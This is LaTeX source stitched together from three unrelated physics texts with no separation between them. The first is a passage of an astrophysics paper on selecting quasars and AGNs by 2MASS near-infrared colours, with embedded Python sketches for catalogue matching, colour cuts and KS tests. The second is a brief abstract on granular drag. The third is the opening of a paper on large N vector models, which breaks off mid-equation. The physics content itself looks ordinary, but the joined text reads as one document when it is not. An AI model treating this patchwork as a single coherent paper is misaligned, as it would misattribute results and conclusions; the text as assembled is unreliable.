$2 < z \leq 3$ & 67 (25) & 197 (75) & 264 & 38 (19) & 165 (81) & 203 \\
$3 < z \leq 4$ & 7 (16) & 36 (84) & 43 & 9 (18) & 41 (82) & 50 \\
$4 < z \leq 5$ & 5 (71) & 2 (29) & 7 & 1 (50) & 1 (50) & 2 \\ \hline
total & 1 998 (29) & 4 970 (71) & 6 968 & 500 (18) & 2 317 (82) & 2 817 \\ \hline
\end{tabular}
\caption{
The number of objects in Regions I and II.
Of the 7 061 AGNs selected from the QA catalogue,
93 do not have a measured redshift. The values in parentheses are the percentages of quasars/AGNs residing in each region.
\label{Ratio}}
\end{center}
\end{table*}
\subsection{SDSS-DR5 quasar catalog}
The Sloan Digital Sky Survey (SDSS)
provides a photometrically and astrometrically
calibrated digital imaging survey of $\pi$ sr above Galactic latitude $30^\circ$
in five broad optical bands to a depth of $g' \sim 23$ mag \citep{York2000-AJ}.
Many astronomical catalogues have been produced by this survey.
The SDSS quasar catalog IV \citep[][hereafter SQ]{Schneider2007-AJ} is
the fourth edition of the SDSS quasar catalog \citep[first edition:][]{Schneider2002-AJ}
and is constructed from the SDSS Fifth Data Release \citep{Adelman2007-ApJS}.
The SQ catalogue consists of 77 429 quasars,
the vast majority of which were discovered by the SDSS.
The area covered by the catalogue is $\approx 5740$ deg$^2$.
The quasar redshifts range from 0.08 to 5.41, with a median value of 1.48.
The positional accuracy of each object is better than $0_\cdot''2$.
\subsection{Quasars and Active Galactic Nuclei (12th Ed.)}
The catalogue of Quasars and Active Galactic Nuclei (12th Ed.) \citep[][hereafter QA]{Veron2006-AA} is
the 12th edition of the catalogue of quasars first published in 1971 by De Veny et al.
The QA catalogue contains 85 221 quasars, 1 122 BL Lac objects and
21 737 active galaxies (including 9 628 Seyfert 1s).
This catalogue includes positions and redshifts as well as optical brightnesses (U, B, V) and 6 cm and 20 cm flux densities, when available.
The positional accuracy is better than $1_\cdot''0$.
\section{Near-infrared properties of AGNs}\label{Properties}
\subsection{Extraction of Near-infrared counterpart}
The sources in the two above-mentioned AGN catalogues (SQ and QA)
were cross-identified with the 2MASS PSC,
and we extracted a near-infrared counterpart of each source.
As mentioned in the previous section,
the positional accuracies of both catalogues are better than $1''$.
Therefore, we identified a near-infrared counterpart
when a 2MASS source is located within $1''$ of an SQ/QA position.
As a result of this extraction,
we derived 9 658 (SQ catalogue) and 14 078 (QA catalogue)
near-infrared counterparts.
To investigate the near-infrared properties using 2MASS magnitudes,
we used only the 2 817 (SQ) and 7 061 (QA) objects whose 2MASS photometric quality flags are
B or better (signal-to-noise ratio (S/N) $>7$).
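For concreteness, the $1''$ matching step can be sketched in a few lines of Python (an illustrative reimplementation, not the actual pipeline; the coordinates in the usage example are hypothetical):

```python
import math

def ang_sep_arcsec(ra1, dec1, ra2, dec2):
    """Angular separation in arcsec between two sky positions given in degrees
    (Vincenty formula, numerically stable at small separations)."""
    r1, d1, r2, d2 = map(math.radians, (ra1, dec1, ra2, dec2))
    dr = r2 - r1
    num = math.hypot(math.cos(d2) * math.sin(dr),
                     math.cos(d1) * math.sin(d2) - math.sin(d1) * math.cos(d2) * math.cos(dr))
    den = math.sin(d1) * math.sin(d2) + math.cos(d1) * math.cos(d2) * math.cos(dr)
    return math.degrees(math.atan2(num, den)) * 3600.0

def is_counterpart(cat_pos, psc_pos, radius_arcsec=1.0):
    """Accept a 2MASS PSC source as the near-infrared counterpart of a
    catalogued quasar/AGN if it lies within the matching radius."""
    return ang_sep_arcsec(*cat_pos, *psc_pos) <= radius_arcsec
```

In practice such a match is run against the full PSC with a spatial index; the sketch only shows the acceptance criterion for a single pair.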
\subsection{Colour-colour diagram}
The near-infrared $(H-K_\textnormal{\tiny S})$ versus $(J-H)$ colour-colour diagram (CCD) is
a powerful tool for investigating the properties of celestial objects.
We therefore examined the near-infrared properties of quasars/AGNs in this diagram.
Figure \ref{CCD1} shows the distributions of quasars/AGNs in a ($H-K_\textnormal{\tiny S}$)-($J-H$) CCD.
The intrinsic loci of normal stars and Classical T Tauri Stars (CTTS)
were defined in previous studies by \citet{Bessell1988-PASP} and \citet{Meyer1997-AJ}, respectively,
and are also shown in the CCD.
The \citet{Bessell1988-PASP} and Caltech (CIT) photometric systems were transformed into the 2MASS photometric system
with the method introduced by \citet{Carpenter2001-AJ}.
The reddening vector, taken from \citet{Rieke1985-ApJ}, is also shown in the diagram.
Because the stellar and CTTS loci can shift only along the reddening vector,
stars of these types should essentially never be located in the region described by the following equations:
\begin{eqnarray}
(J-H) \leq 1.70(H-K_\textnormal{\tiny S})-0.118 \label{Star}\\
(J-H) \leq 0.61 (H-K_\textnormal{\tiny S})+0.50 \label{CTTS}
\end{eqnarray}
Equation (\ref{Star}) represents the lower limit line where normal stars can reside and
Equation (\ref{CTTS}) represents the lower limit line where CTTS can reside.
Both lines are also shown in Fig. \ref{CCD1}.
Below, we call the region enclosed by Equations (\ref{Star}) and (\ref{CTTS}) ``Region II''
and all other regions ``Region I''.
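A sketch of this selection as a small classifier (the two cuts of Eqs. (\ref{Star}) and (\ref{CTTS}); the magnitudes in the usage example are hypothetical):

```python
def region(j, h, ks):
    """Classify a source by its near-infrared colours.
    Region II (the quasar/AGN locus) is the area below BOTH the stellar
    lower-limit line and the CTTS lower-limit line."""
    jh, hks = j - h, h - ks
    below_stellar = jh <= 1.70 * hks - 0.118  # stellar lower-limit line
    below_ctts = jh <= 0.61 * hks + 0.50      # CTTS lower-limit line
    return "II" if (below_stellar and below_ctts) else "I"
```

For example, a quasar-like source with $(J-H)=0.7$ and $(H-K_S)=0.8$ falls in Region II, while a star-like source with $(J-H)=0.65$ and $(H-K_S)=0.2$ falls in Region I.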
Figure \ref{CCD1} shows that most quasars/AGNs
are located in clearly different areas from the stellar loci.
The quasars/AGNs lie to the right of the stellar loci in the CCD,
i.e., they have a $(J-H)$ colour similar to that of normal stars
but a $(H-K_\textnormal{\tiny S})$ colour redder than that of normal stars.
Table \ref{Ratio} lists the number of objects in each region.
It shows that about 70\% of AGNs and 80\% of quasars fall in Region II.
Hence, the near-infrared selection of quasars can be more effective than that of other types of AGN.
In particular, $\sim 90\%$ of low-redshift quasars with $0 \leq z \leq 1$ reside in Region II,
so these quasars are rarely missed.
However, objects with $1< z \leq 2$ or $4<z \leq 5$ tend to have a bluer $(H-K_\textnormal{\tiny S})$ colour
than objects in the other redshift ranges, similar to the colour of normal stars.
Therefore, some of these quasars/AGNs might be missed.
The difference between the loci of quasars/AGNs and normal stars is
probably due to their different radiation mechanisms,
because the dominant radiation of quasars/AGNs is not blackbody radiation.
This colour property is considered to be caused by the K-band excess \citep{Warren2000-MNRAS}.
\citet{Warren2000-MNRAS} proposed the $KX$ method, in which quasars with a ($V-J$) colour similar to
that of stars are redder in ($J-K$) colour.
In other words, the $KX$ method can separate quasars from stars on the basis of their colours.
This technique has been used for selecting quasar candidates
\citep[e.g., ][]{Smail2008-MNRAS,Jurek2008-MNRAS,Nakos2009-AA}.
The present work is a variant of the original $KX$ technique,
using the $(J-H)$ versus $(H-K_\textnormal{\tiny S})$ diagram.
\subsection{Colours versus redshift}
\begin{figure}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/sdss-z-color.eps}}
\end{center}
\caption{Colours versus redshift for SDSS quasars.
The redshifts are taken from the SQ catalogue.
The red solid lines show the average colour evolutions with respect to redshift.
\label{Z-Colours}}
\end{figure}
In Fig. \ref{Z-Colours}, we plot three colours of the SDSS quasars versus redshift,
together with the average colour evolution with respect to redshift.
The redshifts are taken from the SQ catalogue.
Each colour shows only a small variation and dispersion with redshift,
probably due to a variety of spectral shapes and/or extinctions.
In the near-infrared CCD, this small colour variation produces only a small shift of the AGN locus.
These properties can be reproduced by the simulation described below.
\section{Simulating the near-infrared colours of quasars}\label{Simulation}
\begin{figure*}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/z-color-simulation.eps}}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/z-color-sdss-simulate2b.eps}}
\caption{Simulated colours versus redshift.
The curves represent the simulated colour evolutions
with $A_\textnormal{\tiny V}=0,1,2,3,4$ (from bottom to top), respectively.
The SDSS quasars (left panel) and the average colour evolution (right panel)
shown in Fig. \ref{Z-Colours} are also plotted in the diagram.
\label{Z-Simulated-Colours}}
\end{center}
\end{figure*}
\begin{figure}[tbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/ccd-simulation2-b.eps}}
\end{center}
\caption{Simulated colour evolution with respect to redshift in the ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram.
The stellar locus and the reddening vector, the same as in Fig. \ref{CCD1}, are also shown in the diagram.
\label{CCD-Simulation}}
\end{figure}
\begin{table}[tbp]
\begin{center}
\begin{tabular}{crrr}
\hline \hline
$A_\textnormal{\tiny V}$ & $J-K_\textnormal{\tiny S}$ & $J-H$ & $H-K_\textnormal{\tiny S}$ \\ \hline
0 & 0.78 (0) & 0.94 (0) & 0.86 (0) \\
1 & 0.94 (0) & 0.69 (0) & 0.60 (0) \\
2 & 0.26 (17) & 0.29 (9) & 0.14 (84) \\
3 & 0.79 (0) & 0.82 (0) & 0.59 (0) \\
4 & 1.0 (0) & 1.0 (0) & 0.88 (0) \\ \hline
\end{tabular}
\caption{
Results of KS tests between the average colour evolution and the simulated colour evolutions.
The decimal values are the KS distances between the two curves, and
the values in parentheses are the significance levels (percentages) of the KS tests.
\label{KS-test}}
\end{center}
\end{table}
In this section,
we demonstrate, on the basis of a simulation using a realistic quasar SED,
that the locus of quasars is well separated from that of normal stars.
In order to simulate the near-infrared colours of quasars,
we performed a Monte Carlo simulation with the Hyperz code \citep{Bolzonella2000-AA}.
The Hyperz code calculates photometric redshifts from an input spectral template library,
finding the best-fit SED by minimizing the $\chi^2$ of
the comparison between the observed and template SEDs.
Reddening effects are taken into account according to a selected reddening law.
Although this code is usually used for estimating photometric redshifts,
we use it here to derive the near-infrared colours at various redshifts.
First, we made magnitude lists containing randomly generated J, H, and K$_\textnormal{\tiny S}$ magnitudes
ranging from 8 to 16 mag (roughly coincident with the reliable range of 2MASS magnitudes),
producing 100 000 data sets.
These data sets were subjected to
SED fittings using the Hyperz code.
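The data-generation step can be sketched as follows (an illustrative reimplementation; the subsequent SED fitting itself is performed by Hyperz):

```python
import random

def make_magnitude_sets(n=100_000, lo=8.0, hi=16.0, seed=42):
    """Generate n random (J, H, Ks) magnitude triples, drawn uniformly from
    the reliable 2MASS range of 8-16 mag, as input data sets for the SED fits."""
    rng = random.Random(seed)
    return [(rng.uniform(lo, hi), rng.uniform(lo, hi), rng.uniform(lo, hi))
            for _ in range(n)]
```

Each triple is then fit against the redshifted, reddened template SED, so that the accepted fits trace the template colours as a function of redshift.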
A realistic quasar SED was taken from \citet{Polletta2007-ApJ}
(the QSO1 template).
According to \citet{Polletta2007-ApJ},
the QSO1 SED was derived by combining the SDSS quasar composite spectrum
with rest-frame IR data of a sample of 3 SDSS/SWIRE quasars \citep{Hatziminaoglou2005-AJ}.
We used the reddening law of \citet{Calzetti2000-ApJ}, which is provided by default in the Hyperz code.
Feeding the data sets into the Hyperz code,
we derived photometric redshifts together with the probabilities associated with the value of $\chi^2$,
and kept only objects with probabilities of $\geq 99\%$.
Figure \ref{Z-Simulated-Colours} shows the simulated colour evolutions with respect to redshift.
The curves in each diagram represent the simulated colours
with $A_\textnormal{\tiny V} =0$, 1, 2, 3, 4 (from bottom to top), respectively.
To find the best fit to the average colour curves,
we performed Kolmogorov-Smirnov (KS) tests between the average colour curves and each simulated colour curve.
Table \ref{KS-test} shows the results of the KS tests.
In all three colours, the colour evolution with $A_\textnormal{\tiny V}=2$ is
the best fit among the five $A_\textnormal{\tiny V}$ values.
In addition, the redshift-colour relations of the SQ quasars can be roughly reproduced
by the simulated curves with $0\lesssim A_\textnormal{\tiny V} \lesssim 3$.
A variety of extinctions probably generates the dispersion of the colours.
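The model-selection step of the KS tests — computing a two-sample KS distance between the average observed colour curve and each simulated $A_V$ curve, then keeping the smallest — can be sketched as follows (a minimal KS statistic in plain Python; the curves in the usage example are toy data, not the actual colour curves):

```python
import bisect

def ks_distance(sample_a, sample_b):
    """Two-sample Kolmogorov-Smirnov statistic:
    the maximum distance between the two empirical CDFs."""
    a, b = sorted(sample_a), sorted(sample_b)
    d = 0.0
    for x in a + b:
        f_a = bisect.bisect_right(a, x) / len(a)
        f_b = bisect.bisect_right(b, x) / len(b)
        d = max(d, abs(f_a - f_b))
    return d

def best_extinction(avg_curve, simulated_curves):
    """Pick the A_V whose simulated colour curve lies closest to the average one."""
    return min(simulated_curves,
               key=lambda av: ks_distance(avg_curve, simulated_curves[av]))
```

The significance levels quoted in Table \ref{KS-test} additionally require the KS probability distribution, which is available in standard statistics libraries.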
It should be noted that both the ($J-H$) and ($J-K_\textnormal{\tiny S}$) colours steeply
increase beyond $z\sim 9$.
This is due to the Lyman break shifting across the J-band wavelength range.
This property can be useful for extracting high-redshift quasars.
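The onset redshift follows from simple arithmetic: for quasars the effective break is the Ly$\alpha$ forest absorption at rest-frame 1216 \AA, and the colours change once it redshifts into the J band. A sketch (the band wavelengths below are approximate assumptions):

```python
LYA_REST_UM = 0.1216   # rest-frame Lyman-alpha wavelength (micron)
J_BLUE_EDGE_UM = 1.1   # approximate blue edge of the J band (micron)
J_CENTER_UM = 1.25     # J-band effective wavelength (micron)

# break enters the J band: colours start to redden
z_onset = J_BLUE_EDGE_UM / LYA_REST_UM - 1.0    # ~8.0
# break reaches the band centre: (J-H) strongly suppressed
z_through = J_CENTER_UM / LYA_REST_UM - 1.0     # ~9.3
```

These two values bracket the $z\sim 8$--9 range quoted in the text for the steep colour increase.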
In Fig. \ref{CCD-Simulation}, the simulated colours with $A_\textnormal{\tiny V}=2$ are shown
in the ($H-K_\textnormal{\tiny S}$)-($J-H$) CCD, tracked by redshift evolution.
An important point is that the simulated locus is well separated from the stellar locus,
and is consistent with the loci of quasars/AGNs shown in Fig. \ref{CCD1}.
A variety of extinctions disperses the simulated positions, and
this can probably reproduce the dispersion of the quasar/AGN loci in Fig. \ref{CCD1}.
It is also consistent with the fact that
quasars with $0 \leq z \leq 1$ have a relatively redder ($H-K_\textnormal{\tiny S}$) colour than
quasars with $1 \leq z \leq 2$.
Although it is difficult to distinguish high-redshift quasars at $z\lesssim 8$,
we can extract high-redshift quasar candidates with $z \gtrsim 8$
on the basis of the ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram,
because the ($J-H$) colour steeply increases beyond $z \sim 8$.
\section{Discussion}\label{Discussion}
\subsection{Other probable objects} \label{Probabilities}
\begin{figure*}[tbp]
\begin{tabular}{cc}
(a) & (b) \\
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/mqso-hk-jh.eps}}
\end{center}
\end{minipage}
&
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/cv2009-hk-jh.eps}}
\end{center}
\end{minipage} \\
(c) & (d) \\
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/lmxb-hk-jh.eps}}
\end{center}
\end{minipage}
&
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{80mm}{!}{\includegraphics[clip]{figure/cmyso-hk-jh.eps}}
\end{center}
\end{minipage}\end{tabular}
\caption{The distribution of four types of objects: Microquasars (upper left),
Cataclysmic variables (upper right), Low Mass X-ray Binaries (lower left),
and Massive Young Stellar Objects (lower right).
The stellar locus and the reddening vector are the same as in Fig. \ref{CCD1}.
\label{CCD2}}
\end{figure*}
\begin{table}[tbp]
\begin{center}
\begin{tabular}{rrrrr}
\hline \hline
& Microquasars & CV & LMXB & MYSO \\ \hline
I & 16 (84) & 245 (75) & 11 (73) & 27 (93) \\
II & 3 (16) & 82 (25) & 4 (27) & 2 (7) \\
total & 19 & 327 & 15 & 29 \\ \hline
\end{tabular}
\caption{
The number and percentage of objects in each region.
The values in parentheses represent percentages.
\label{ratio-four-objects}}
\end{center}
\end{table}
Although the locus of AGNs in the near-infrared CCD differs from that of normal stars,
other types of objects with properties similar to AGNs might be distributed in the same locus.
If the position in the CCD depends on the radiation mechanism,
other objects with radiation mechanisms similar to those of AGNs are also expected to be located at the same position.
Below, we further examine the loci of four types of objects which have non-thermal radiation or
which are considered to be bright at both near-infrared and X-ray wavelengths:
Microquasars, Cataclysmic Variables (CVs), Low Mass X-ray Binaries (LMXBs), and
Massive Young Stellar Objects (MYSOs).
Sample objects are extracted from three catalogues, namely
Microquasar Candidates \citep[Microquasars; ][]{Combi2008-AA},
Cataclysmic Binaries, LMXBs, and related objects \citep[CVs and LMXBs; ][]{Ritter2003-AA},
and the Catalogue of massive young stellar objects \citep[MYSOs; ][]{Chan1996-AAS}.
First, we cross-identified each catalogue with 2MASS PSC, and
extracted the near-infrared counterparts.
\citet{Combi2008-AA} had already cross-identified their catalogue with the 2MASS catalogue
by adopting a cross-identification radius of $4''$.
The positional accuracy of the Ritter \& Kolb catalogue is $\sim 1''$ \citep{Ritter2003-catalogue}.
The objects in the MYSO catalogue were selected from the Infrared Astronomical Satellite (IRAS) PSC,
whose typical position uncertainties are about $2''$ to $6''$ \citep{Beichman1988-IRAS,Helou1988-IRAS}.
Therefore, we set the positional criteria for the cross-identification
to $\leq 2''$ (CV and LMXB catalogues) and $\leq 4''$ (Microquasar and MYSO catalogues).
We used objects with a 2MASS photometric quality of B or better (i.e., S/N $> 7$).
Using the 2MASS magnitudes, they were plotted in a ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram.
Figure \ref{CCD2} shows the CCD of each object.
In every case, a few objects are distributed around the locus of the AGNs,
although most of the objects lie around the stellar locus
or in the region reddened from the stellar locus.
Table \ref{ratio-four-objects} lists the number and percentage of objects in each region.
Although the fractions of CVs and LMXBs residing in Region II are relatively larger than those of the other two types of objects,
they do not exceed $\sim 27\%$.
In addition, few of these objects have $(H-K_\textnormal{\tiny S}) \sim 0.8$ in Region II,
though most quasars/AGNs have this colour (see Fig. \ref{CCD1}).
Accordingly, the contamination by these four types of objects should be small.
This suggests that the dominant radiation of the four types of objects is thermal.
AGNs also emit thermal radiation,
but it is a very small fraction compared with the non-thermal component produced
by accretion onto supermassive black holes.
Therefore, AGNs should be well separated from these four types of objects using the near-infrared colours.
\subsection{Contamination by normal galaxies}
\begin{figure}[thbp]
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/ccd-simulation-ngalaxy-0z3.eps}}
\end{center}
\caption{
Simulated colour evolutions for seven spiral galaxies.
The redshift ranges from 0.0 to 3.0, sampled at intervals of $\Delta z=0.2$.
The boundary between Region I and II is also drawn in the diagram.
\label{Simulate-galaxy-colour}}
\end{figure}
Distant galaxies that appear as point-like sources might
contaminate the AGN locus in the near-infrared CCD.
We verified the locus of normal galaxies in the near-infrared CCD
by performing a Monte Carlo simulation as in Sect. \ref{Simulation}.
The SED templates we used are those of seven spiral galaxies in \citet{Polletta2007-ApJ},
ranging from early to late types (S0--Sd).
Figure \ref{Simulate-galaxy-colour} shows the simulated intrinsic colours
(i.e., $A_\textnormal{\tiny V}=0$) of the seven galaxies.
Galaxies with $0\leq z\lesssim 0.8$ have intrinsic colours similar to those of normal stars
(i.e., they are in Region I).
Galaxies with $1.4 \lesssim z \leq 3$ are distributed
around the reddened regions of normal stars and/or CTTS.
Therefore, they should not be mistaken for AGN candidates.
On the other hand, the simulated colours at $z \sim 1$ are located in Region II.
A fraction of the AGNs in Region II could therefore be confused with galaxies at $z\sim 1$.
However, galaxies at $z\sim 1$ are too faint to be detected with mid-sized telescopes.
Even the brightest galaxies reach only $M \sim -23$ mag in the SDSS r band \citep{Blanton2001-AJ,Baldry2004-ApJ}.
If such a galaxy were located at $z\sim 1$,
its apparent magnitude would be $m \gtrsim 20$ mag in the J band.
In addition, the apparent magnitude would generally be even fainter,
because most galaxies have $M>-23$ mag and the apparent brightness suffers extinction.
Accordingly, only large-scale telescopes can observe these galaxies.
Hence, few galaxies should contaminate the AGN locus in the near-infrared CCD
for data whose limiting magnitude is brighter than 20 mag.
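This faintness estimate can be checked with the standard distance modulus $m = M + 5\log_{10}(d_L/10\,{\rm pc})$; a sketch assuming a flat $\Lambda$CDM cosmology with $H_0=70$ km s$^{-1}$ Mpc$^{-1}$ and $\Omega_m=0.3$ (K-corrections are ignored here):

```python
import math

def luminosity_distance_mpc(z, h0=70.0, om=0.3, n_steps=10_000):
    """Luminosity distance in a flat LCDM cosmology, via trapezoidal
    integration of the comoving-distance integral."""
    c = 299792.458  # speed of light, km/s
    def inv_e(zz):
        return 1.0 / math.sqrt(om * (1.0 + zz) ** 3 + (1.0 - om))
    dz = z / n_steps
    integral = 0.5 * (inv_e(0.0) + inv_e(z)) * dz
    integral += sum(inv_e(i * dz) for i in range(1, n_steps)) * dz
    return (1.0 + z) * (c / h0) * integral

def apparent_mag(abs_mag, z):
    """Apparent magnitude from the distance modulus m = M + 5 log10(d_L / 10 pc)."""
    d_l_pc = luminosity_distance_mpc(z) * 1.0e6
    return abs_mag + 5.0 * math.log10(d_l_pc / 10.0)
```

With these assumptions $d_L(z=1)\approx 6.6$ Gpc, so an $M=-23$ galaxy at $z\sim 1$ indeed has $m\approx 21 > 20$ mag, consistent with the argument above.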
\section{Summary and Conclusion}
We confirmed the loci of catalogued quasars/AGNs in a ($H-K_\textnormal{\tiny S}$)-($J-H$) diagram,
of which 70--80\% are clearly separated from the stellar locus.
In addition,
we simulated the near-infrared colours of quasars by means of a Monte Carlo simulation with the Hyperz code,
and demonstrated that the simulated colours can reproduce both the redshift-colour relations and
the locus of quasars in the near-infrared CCD.
We also predicted the colour evolution with respect to redshift (up to $z \sim 11$).
Finally, we discussed the possibility of contamination by other types of objects.
The locus of AGNs is also different from those of
four other types of objects (namely, Microquasars, CVs, LMXBs, and MYSOs)
that might be expected to occupy a similar locus.
We also demonstrated by a Monte-Carlo simulation
that normal galaxies are unlikely to contaminate the locus of AGNs in the near-infrared CCD.
\citet{Hewett2006-MNRAS} investigated the near-infrared colours of quasars using an artificial SED,
whereas we have proposed near-infrared colour selection criteria for extracting AGNs and
studied both the observed and simulated colours with quantitative discussions.
An important point is that our selection criteria require only near-infrared photometric data,
whereas some previous studies \citep[e.g., ][]{Glikman2007-ApJ,Glikman2008-AJ} used colour selections
based on colours between near-infrared and optical wavelengths.
In other words, our selection criteria make the extraction of candidates easier
because only near-infrared colours are needed.
This technique should also be useful in searches for high-redshift quasars,
since they become very faint at optical wavelengths due to the shift of the Lyman break.
This paper demonstrates that near-infrared colours can be useful to select AGN candidates.
If an additional constraint is imposed, more reliable candidates can be extracted.
When the near-infrared colour selection with an additional constraint is applied
to near-infrared catalogues covering a large area
(e.g., 2MASS, DENIS, UKIDSS, and future surveys),
a large sample of AGNs (possibly over $\sim$10 000) is expected over a region of $\sim$10 000 deg$^2$.
\citet{Kouzuma2009-prep} \citep[see also][]{Kouzuma2009-ASPC} cross-identified the 2MASS and ROSAT catalogues and
extracted AGN candidates over the entire sky using the near-infrared colour selection presented in this paper.
Such a large sample may provide clues about, for example, the evolution of AGNs and the X-ray background.
Additionally, in our simulation, quasars with $z \gtrsim 8$ can be extracted on the basis of near-infrared colours.
This property might be helpful to search for high-redshift quasars in the future.
\begin{acknowledgements}
This publication makes use of data products from the Two Micron All Sky Survey,
which is a joint project of the University of Massachusetts and
the Infrared Processing and Analysis Center/California Institute of Technology,
funded by the National Aeronautics and Space Administration and the National Science Foundation.
Funding for the SDSS and SDSS-II has been provided by the Alfred P. Sloan Foundation,
the Participating Institutions, the National Science Foundation, the U.S. Department of Energy,
the National Aeronautics and Space Administration, the Japanese Monbukagakusho,
the Max Planck Society, and the Higher Education Funding Council for England.
The SDSS Web Site is http://www.sdss.org/.
We thank the anonymous referee for useful comments to improve this paper.
\end{acknowledgements}
\bibliographystyle{aa}
\section{Summary}
Monodisperse packings of dry, air-fluidized granular media typically exist at volume fractions from $\Phi = 0.585$ to 0.64. We demonstrate that the dynamics of granular drag are sensitive to the volume fraction $\Phi$, and that there exists a transition in the drag force and material deformation from smooth to oscillatory at a critical volume fraction $\Phi_{c}=0.605$. By dragging a submerged steel plate (3.81 cm width, 6.98 cm depth) through $300~\mu m$ glass beads prepared at volume fractions between 0.585 and 0.635, we find that below $\Phi_{c}$ the deformation of the medium is smooth and non-localized, while above $\Phi_{c}$ the medium fails along distinct shear bands. At high $\Phi$ the generation of these shear bands is periodic, resulting in ripples on the surface. Work funded by The Burroughs Wellcome Fund and the Army Research Lab MAST CTA.
\end{document}
\section{Introduction}
Evolutionary processes have been studied in the framework of Quantum
Mechanics from its early days. Even the first complete formulation
of the principles of Quantum Mechanics described a way to find the time
dependence of observables (the Heisenberg equations). In Quantum Field Theory
the common lore concerns mainly the properties of vacua and
perturbations around them. Still, time-dependent processes are
crucial in various branches of QFT (inflationary cosmology, QFT in
curved spaces, etc.). These processes include the rolling of a quantum
field from a maximum of a potential, oscillations around a minimum,
and tunneling from one minimum of a potential to another.
In general, the study of time-dependent processes in QFT is
prohibitively difficult. It can be carried out, however, in large
$N$ vector models.
A large $N$ vector model with a global $O(N)$ symmetry is a rare
example of a field theory in which an exact vacuum state can be found
(for a review of large $N$ models see \cite{Moshe:2003xn}). This
model has served as a toy model for various problems common in QFT.
The three-dimensional scale-invariant model was shown to be conformal
at the quantum level \cite{Bardeen:1983rv} and to possess a non-trivial phase
structure \cite{Bardeen:1983st}.
vector model were suggested in \cite{Asnin:2009bs} and applied there
to the case of $d=3$. The applications included an exact rolling
solution of a $\phi^6$ model with vanishing energy and an
approximate solutions for oscillations around minima in a general
potential. In all cases the quantum processes were found to occur
faster than their classical counterparts, signalizing a presence of
terms with time derivatives in addition to a known correction to a
classical potential. A possible tunneling in the model was also
studied and the tunneling amplitude was found to be larger than in
the semiclassical computation.
The main difficulty in solving for time-dependent processes in the
large $N$ model, as discussed in \cite{Asnin:2009bs}, is the necessity
of finding the Green's function of a differential operator which itself
contains an unknown function. In this paper we show that this
problem can be solved in the case of $d=1$, which corresponds to
large $N$ quantum mechanics.
Large $N$ quantum mechanics has been studied from various points of
view. Numerous approximations have been used in order to derive
systematically a $1/N$ expansion (for a review and a comparison of
some approximation techniques see \cite{Mihaila:2000sr}; in
\cite{Ryzhov:2000fy} yet another approach is suggested). A
supersymmetric version of large $N$ quantum mechanics was also
studied (for the improvements that supersymmetry brings to the large $N$
expansion see \cite{Cooper:1994eh}). A certain supersymmetric
version of large $N$ quantum mechanics was proposed as a
description of a D-brane probe in the bubbling supertubes
\cite{Imamura:2005nx}.
In this paper we solve the EOMs derived in \cite{Asnin:2009bs} for
quantum mechanics in the case of unbroken global $O(N)$ symmetry. We
show that the expectation value of the quantum field evolves in time
according to a classical EOM with a modified potential, which means
that the effective action in this case does not involve any
corrections to the kinetic term, the only correction therefore being
that to the potential. All characteristics of the motion (such as
frequencies of oscillations around minima of the effective potential,
rolling times in that potential, and the possible types of
motion in general) can be derived by means of classical
mechanics. In addition, tunneling is completely suppressed.
The paper is organized as follows. In section \ref{useful_formulas}
we review large $N$ models in general and introduce the equations that
govern the time evolution of the quantum system. In section
\ref{Classical_analysis} we rewrite the classical EOM in a form which
is convenient for a comparison with the quantum case. In section
\ref{Quantum_case} we solve the quantum EOMs. Section \ref{Summary}
is a summary of the results. We end with an appendix
\ref{Tunneling} where we show that there is no tunneling in the
system in the limit $N\to\infty$ and confirm this result by
conventional methods of quantum mechanics.
\section{Scalar model in the large N limit - A review}\label{useful_formulas}
Let us consider an $O(N)$-symmetric Euclidean action for an $N$ -
component scalar field $\vec{\phi}$ in $d$ space-time dimensions
\begin{equation}
S\left( \vec{\phi}\right) =\int \left[ \frac{1}{2}\left(
\partial _{\mu }\vec{\phi}\right) ^{2}+NU\left( \frac{
\vec{\phi}^{2}}{N}\right) \right] d^{d}x \, .\label{scalaraction}
\end{equation} The potential has a Taylor expansion of the form \begin{equation} U\left(
\frac{\vec{\phi}^{2}}{N}\right)
=\sum_{n=1}^{\infty}\frac{g_{2n}}{2n}\left(
\frac{\vec{\phi}^{2}}{N}\right) ^{n} \, ,
\label{ExampleOfPotential}\end{equation} with $g_{2n}$ kept fixed as
$N\to\infty $. The corresponding partition function is \begin{equation} Z=\int
D\vec{\phi}\,e^{-S(\vec{\phi})}\, . \end{equation} In order to use the fact
that $\vec{\phi}$ has many components, we insert the following
representation of unity into $Z$:
\begin{equation} 1\sim\int D\rho\, \delta (\vec{\phi}^{2}-N\rho)\sim \int D\rho
D\lambda\, e^{-i\int \frac{\lambda}{2}(\vec{\phi} ^{2}-N\rho
)d^{d}x}\, . \label{identity} \end{equation} Now one can integrate over
$\vec{\phi}$ and obtain \begin{equation} Z= \int D\rho D\lambda\,
e^{-N S_{eff}(\rho,\,\lambda) }\, ,
\label{partition} \end{equation} where
\begin {equation}
S_{eff}(\rho,\lambda)=\frac{1}{2}\int\left[2U(\rho) -i\lambda\rho\right]d^{d}x
+\frac{1}{2}Tr\ln \left( -\square +i\lambda \right) \, .
\label{Seff}
\end{equation}
When $N$ is large, this form of the path integral suggests using
the saddle point method to calculate the integral. The two saddle
point equations, obtained by varying the auxiliary fields $\rho$ and
$\lambda$, are\footnote{We use here the definition $Tr=\int
d^{d}x\,tr$.}
\begin{equation} 2U'(\rho)=i\lambda,\qquad \rho=tr\frac{1}{-\square+i\lambda}\, ,
\label{scalar_gap} \end{equation}
This form of the saddle point equations is convenient in the case of
constant fields. These constant solutions can be found as extrema of
the effective potential \begin{equation}
U_{eff}(\rho)=U(\rho)+\frac{2-d}{2\,d}\,\Gamma\left(1-\frac
